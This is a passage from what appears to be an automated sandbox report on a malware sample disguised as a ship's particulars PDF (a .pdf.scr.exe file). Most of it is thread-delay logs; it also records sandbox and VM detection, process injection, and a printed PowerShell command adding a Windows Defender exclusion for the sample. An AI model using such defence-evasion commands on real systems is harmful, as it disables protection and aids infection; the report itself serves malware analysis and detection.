                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596187Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596078Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595859Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595640Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595531Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595422Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595312Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595203Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594983Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594547Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594219Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2376Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 823Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWindow / User API: threadDelayed 1867Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWindow / User API: threadDelayed 7987Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 6780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 5680Thread sleep count: 1867 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 5680Thread sleep count: 7987 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -599016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -598122s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594983s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 598122Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597625Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596625Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596297Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596187Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 596078Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595859Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595640Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595531Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595422Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595312Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595203Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594983Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594875Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594547Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeThread delayed: delay time: 594219Jump to behavior
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1824315473.0000000007187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1824315473.0000000007187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!
                  Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4187413405.0000000001073000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeMemory written: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeProcess created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
